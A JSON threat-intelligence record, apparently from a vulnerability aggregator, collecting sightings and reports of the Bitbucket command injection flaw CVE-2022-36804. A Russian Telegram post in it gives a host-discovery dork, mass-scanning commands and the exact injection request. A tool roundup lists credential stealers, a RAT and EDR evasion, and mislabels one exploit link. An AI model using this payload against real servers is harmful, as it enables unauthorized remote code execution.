{"vulnerability": "CVE-2022-36804", "sightings": [{"uuid": "528e8061-553e-4f8c-961d-a2d330248408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "1800f62f-620b-4904-b959-b6fa449ecb4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971719", "content": "", "creation_timestamp": "2024-12-24T20:33:13.245794Z"}, {"uuid": "ae667e3a-63e6-42d5-984c-fb2e88841f16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "dde74aec-6c9a-405e-8fd0-f390b532a418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:48.000000Z"}, {"uuid": "b6e425c0-1352-4195-a229-4afd4713dc95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-85aeda5d-3a0884ef4e0bac3a", "content": "", "creation_timestamp": "2025-07-23T06:09:01.055860Z"}, {"uuid": "cdf75552-fbc9-4da8-88bc-d5aecdc8f0a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:38.000000Z"}, {"uuid": "8a8fd77e-e3a6-4636-b850-129781b7f590", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://www.cert.at/de/warnungen/2022/8/kritische-sicherheitslucke-in-atlassian-bitbucket-server-and-data-center-updates-verfugbar", "content": "", "creation_timestamp": "2022-08-29T11:27:11.000000Z"}, {"uuid": "e14c83d0-0b8a-48ea-918f-f81057b306d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/bitbucket_cve_2022_36804", "content": "", "creation_timestamp": "2022-09-16T08:46:49.000000Z"}, {"uuid": "430af0f8-f836-4395-b4bd-e1978fa5034e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb", "content": "", "creation_timestamp": "2022-09-21T17:30:22.000000Z"}, {"uuid": "33977afc-d7e3-4cc3-9fbc-6ee7dad3eb6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-36804", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/3e4cca64-435e-4259-af5f-56a6ca633dd1", "content": "", "creation_timestamp": "2026-02-02T12:27:12.200624Z"}, {"uuid": "30d1ada2-8405-4aaa-85ba-e110dd835734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/cKure/10222", "content": "Zero-Day: Thread on CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability.\n\nhttps://twitter.com/_0xf4n9x_/status/1572052954538192901", "creation_timestamp": "2022-09-21T15:11:34.000000Z"}, {"uuid": "96fa99a4-17b4-4b74-8d94-a9bb15268956", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3114", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aYou can find a python script to exploit the vulnerability on Bitbucket related CVE-2022-36804.\nURL\uff1ahttps://github.com/khal4n1/CVE-2022-36804\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-25T02:47:41.000000Z"}, {"uuid": "593893a2-4837-4562-89b3-c7f4fe96ce4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8420", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aA real exploit for BitBucket RCE CVE-2022-36804\nURL\uff1ahttps://github.com/notdls/CVE-2022-36804\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-08-31T01:31:24.000000Z"}, {"uuid": "6f3e98f1-7bc0-4eea-9190-25034f5711dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/ckuRED/197", "content": "Zero-Day: Thread on CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability.\n\nhttps://twitter.com/_0xf4n9x_/status/1572052954538192901", "creation_timestamp": "2022-09-21T15:11:29.000000Z"}, {"uuid": "f5c3d0cd-3e1c-4f9f-98c4-68fc8e0e07b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://t.me/itsec_news/1313", "content": "\u200b\u26a1\ufe0f \u0412 Atlassian Bitbucket Server \u0438 Data Center \u043d\u0430\u0448\u043b\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\ud83d\udcac \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE-2022-36804, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u0445\u0430\u043a\u0435\u0440\u0443 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0442\u043e\u0447\u043a\u0430\u0445. \u0411\u0440\u0435\u0448\u044c \u0432 \u0437\u0430\u0449\u0438\u0442\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 Atlassian \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f, \u0447\u0442\u043e \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2022-36804 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0438\u043c\u0435\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u043c\u0443 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044e Bitbucket \u0438\u043b\u0438 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u0447\u0430\u0441\u0442\u043d\u043e\u0433\u043e \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0418\u0411-\u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430 \u043f\u043e\u0434 \u043d\u0438\u043a\u043d\u0435\u0439\u043c\u043e\u043c @TheGrandPew, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Bitbucket Server \u0438 Datacenter, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u0441\u043b\u0435 6.10.17, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 7.0.0 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435.\n\n\u0414\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043d\u043e \u0432 \u0441\u043b\u0443\u0447\u0430\u044f\u0445, \u0433\u0434\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0435\u043b\u044c\u0437\u044f \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e, Atlassian \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \"feature.public.access=false\", \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0442\u0430\u043a\u043e\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u043d\u0435 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0442\u0430\u043a \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0441 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432\u0441\u0435 \u0435\u0449\u0435 \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f CVE-2022-36804.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u041f\u041e \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u0447\u0442\u043e\u0431\u044b \u0441\u043d\u0438\u0437\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0438\u0441\u043a\u0438.\n\n#AtlassianBitbucketServer #DataCenter #\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-09-10T14:16:11.000000Z"}, {"uuid": "e600680a-ad7b-460d-ae78-0cdae9387942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/328", "content": "\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f Atlassian Bitbucket RCE: CVE-2022-36804\n\n\u2014 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0420\u0421\u0415 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u0434\u043b\u044f \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445:\n7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. \n\u0421\u0435\u0440\u0432\u0438\u0441 \u0443\u044f\u0437\u0432\u0438\u043c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0435 \u0434\u043b\u044f \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043f\u0440\u043e\u0435\u043a\u0442\u044b.\n\n\u2014 \u0414\u043e\u0440\u043a \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0432 \u0448\u043e\u0434\u0430\u043d\u0435 \u0447\u0435\u0440\u0435\u0437 CLI:\nshodan search 'http.html:\"Atlassian Bitbucket\"' --fields ip_str,port --limit -1                                                  \n\n\u2014 \u041f\u043e\u043a\u0430 \u0442\u0435\u043c\u043f\u043b\u0435\u0439\u0442\u0430 \u0434\u043b\u044f \u043d\u0443\u043a\u043b\u0435\u044f \u043d\u0435\u0442\u0443, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c\u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f\u043c\u0438:\n1. \u0424\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u043c \u0445\u043e\u0441\u0442\u044b \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0435\u0441\u0442\u044c \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438\ncat hosts | httpx -follow-redirects -title -path /repos?visibility=public -match-string \"repository-container\" -threads 9500\n2. \u0417\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u0441\u0430\u0439\u0442 \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u043c \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0438 \u0435\u0433\u043e \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\n\n\u2014 \u0414\u0432\u0430 \u043f\u0443\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438:\n1. \u041a\u0430\u0447\u0430\u0435\u043c \u0420\u043e\u0421 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c:\npython3 exploit.py -u https://\u0445\u043e\u0441\u0442 -p \u043f\u0440\u043e\u0435\u043a\u0442 -r \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 -c '\u043a\u043e\u043c\u0430\u043d\u0434\u0430'\n2. \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441:\nhttps://\u0445\u043e\u0441\u0442/rest/api/latest/projects/{\u043f\u0440\u043e\u0435\u043a\u0442}/repos/{\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439}/archive?format=zip&amp;path=bighax&amp;prefix=ax%00--exec=%60{\u043a\u043e\u043c\u0430\u043d\u0434\u0430}%60%00--remote=origin \n\n\u2014 \u0414\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0441\u0442\u0430\u0442\u044c\u044e \u0438 \u044d\u0442\u0443.\n\n\u2014 \u0422\u043e\u043b\u044c\u043a\u043e \u0432 \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445.\n\n\n#cve", "creation_timestamp": "2022-09-26T13:10:15.000000Z"}, {"uuid": "29c37cd7-f1bb-4f25-ab99-250fcbdbee37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://t.me/cyberbannews_ir/6534", "content": "\ud83d\uded1\u0627\u0646\u062a\u0634\u0627\u0631 \u0646\u0633\u062e\u0647 \u0627\u0635\u0644\u0627\u062d\u06cc\u0647 \u0628\u0631\u0627\u06cc \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc \u062f\u0631 Atlassian Bitbucket\n\n\u0634\u0631\u06a9\u062a Atlassian (\u0622\u062a\u0644\u0627\u0633\u06cc\u0627\u0646) \u0646\u0633\u062e\u0647 \u0627\u0635\u0644\u0627\u062d\u06cc\u0647 \u0627\u06cc \u0631\u0627 \u0628\u0631\u0627\u06cc \u06cc\u06a9 \u0646\u0642\u0635 \u0627\u0645\u0646\u06cc\u062a\u06cc \u062c\u062f\u06cc \u062f\u0631 \u0633\u0631\u0648\u0631 \u0648 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 Bitbucket (\u0628\u06cc\u062a \u0628\u0627\u06a9\u0650\u062a) \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0646\u0642\u0635 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0645\u062e\u0631\u0628 \u0628\u0631 \u0631\u0648\u06cc \u0646\u0635\u0628 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0634\u0648\u062f.\n\n\u0627\u06cc\u0646 \u0646\u0642\u0635 \u0627\u0645\u0646\u06cc\u062a\u06cc (CVE-2022-36804) \u0628\u0627 \u062f\u0631\u062c\u0647 \u0634\u062f\u062a 9.9 \u0627\u0632 10 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631 \u062f\u0631 \u0686\u0646\u062f\u06cc\u0646 \u0646\u0642\u0637\u0647 \u0627\u0646\u062a\u0647\u0627\u06cc\u06cc \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc \u0634\u0648\u062f \u06a9\u0647 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0647\u0627\u06cc HTTP \u0645\u062e\u0635\u0648\u0635\u060c \u0645\u0648\u0631\u062f \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0642\u0631\u0627\u0631 \u0628\u06af\u06cc\u0631\u062f. \n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc\n\n\u2705 \u0628\u06cc\u0634\u062a\u0631 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f:\nhttps://bit.ly/3Knmve8\n\n@cyberbannews_ir", "creation_timestamp": "2022-08-27T09:06:15.000000Z"}, {"uuid": "d64372fb-9618-42f0-8ba5-985517ca094f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "Telegram/6tPr8yKsDdoHmlDZwTfwsx1qCIVTJ0oB_7ZcAnj2zLj9", "content": "", "creation_timestamp": "2023-10-23T00:14:21.000000Z"}, {"uuid": "65d321ed-711b-495d-b753-6df93c8b42fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://t.me/ctinow/60668", "content": "Patch critical flaw in Atlassian Bitbucket Server and Data Center! (CVE-2022-36804)\n\nhttps://ift.tt/i5JpB80", "creation_timestamp": "2022-08-29T14:11:29.000000Z"}, {"uuid": "fe79cf3f-ff57-4614-b713-0f9b16d6a4d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2752", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nMicrowaveo\n\nConvert dll exe, etc. to an encrypted shellcode.\n\nhttps://github.com/Ciyfly/microwaveo\n\nCVE-2022-40297\n\nPrivilage escalation in Ubuntu Touch 16.04 - by PIN Bruteforce.\n\nhttps://github.com/filipkarc/PoC-ubuntutouch-pin-privesc\n\n#cve\n\nexploits-predict\n\nPredicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm)\n\nhttps://github.com/wisoffe/exploits-predict\n\n#cve #exploit\n\nvMass Bot\n\nvMass Bot automates the exploitation of remote hosts by trying to find environment files (.env) in target hosts and extract tools and info insde, then the bot detects the target host CMS and tries to auto exploit and upload shell payload using the vMass vulnerability set ( 108 exploits in the current version 1.2).\n\nNo target list ? No worries, vMass Bot can generate hosts lists from IP ranges, URL list, dotenv low profile dorks and scrapes from (bing, duckduckgo, ..) or you can use IP ranges from various hosting providers for best hit rate while scanning, then generated lists can be checked using the bot to eleminate dead hosts.\n\nhttps://github.com/c99tn/vMass\n\nCVE-2022-36804-RCE\n\nZimbra Unauthenticated Remote Code Execution Exploit.\n\nhttps://github.com/mohamedbenchikh/CVE-2022-27925\n\n#cve #exploit\n\nEfiCMake\n\nCMake template for a basic EFI application/bootkit.\n\nhttps://github.com/mrexodia/EfiCMake\n\nDuckySploit\n\nV3 Roblox Level 7 Executor Free.\n\nFeatures:\n\u25ab\ufe0f Dark Hub\n\u25ab\ufe0f Dex Explorer\n\u25ab\ufe0f Fusionic Hub\n\u25ab\ufe0f Kraken Hub\n\u25ab\ufe0f Ori Hub\n\u25ab\ufe0f Owl Hub\n\u25ab\ufe0f Solaris\n\u25ab\ufe0f Zyrex Hub\n\nhttps://github.com/Omnis9/DuckySploit-V3\n\nChameleon\n\nChameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies.\n\nThe tool is highly customizable and allows users to add in their own custom wordlits, extensions or fingerprints.\n\nhttps://github.com/iustin24/chameleon\n\nThe full documentation is available on: \nhttps://youst.in/posts/context-aware-conent-discovery-with-chameleon/\n\nLIKE-DBG\n\nFully dockerized Linux kernel debugging environment.\n\n(LInux-KErnel-DeBuGger) aims at automating the boring steps when trying to set up a Linux kernel debugging environment.\n\nhttps://github.com/0xricksanchez/like-dbg\n\npypykatz\n\nMimikatz implementation in pure Python. \n\nhttps://github.com/skelsec/pypykatz\n\nAndroid RAT\n\n#RAT built in Android APP for Android User\n\nhttps://github.com/Th30neAnd0nly/Ohm\n\nSudo-Stealer\n\nSudo-Stealer is an *nix program for stealing sudo passwords by disguising as the original sudo software. Its capabilities are almost similar to that of the original sudo program as such as displaying the same input messages, error messages like incorrect attempts and also handling of some system signals such as SIGQUIT, SIGINT &amp; SIGTSTP. It verify the password, stores it in json support as well as username, the command that was executed and the execution time in a file for later usage.\n\nFeatures:\n\u25ab\ufe0f Maximum of 3 wrong password attempts\n\u25ab\ufe0f Timeouts the superuser session's after 15 minutes\n\u25ab\ufe0f Stores correct passwords with their respective commands and the time it was executed\n\nhttps://github.com/Genaro-Chris/Sudo-Stealer\n\nEvil-Storm\n\nThis tool can create a Fake Access point.\n\nFeatures:\n\u25ab\ufe0f Create a Fake AP with a specific name and password\n\u25ab\ufe0f DNS spoofing (not completed)\n\u25ab\ufe0f ARP spoofing\n\u25ab\ufe0f Reverse shell\n\u25ab\ufe0f give the Victim Access to the Internet after connecting to your Fake AP\n\u25ab\ufe0f see all websites victim open it you are the Router\n\nhttps://github.com/Root3inspector/Evil-Storm\n\nLimeLighter\n\nA tool which creates a spoof code signing certificates and sign binaries and DLL files to help evade EDR products and avoid MSS and sock scruitney. LimeLighter can also use valid code signing certificates to sign files. Limelighter can use a fully qualified domain name such as 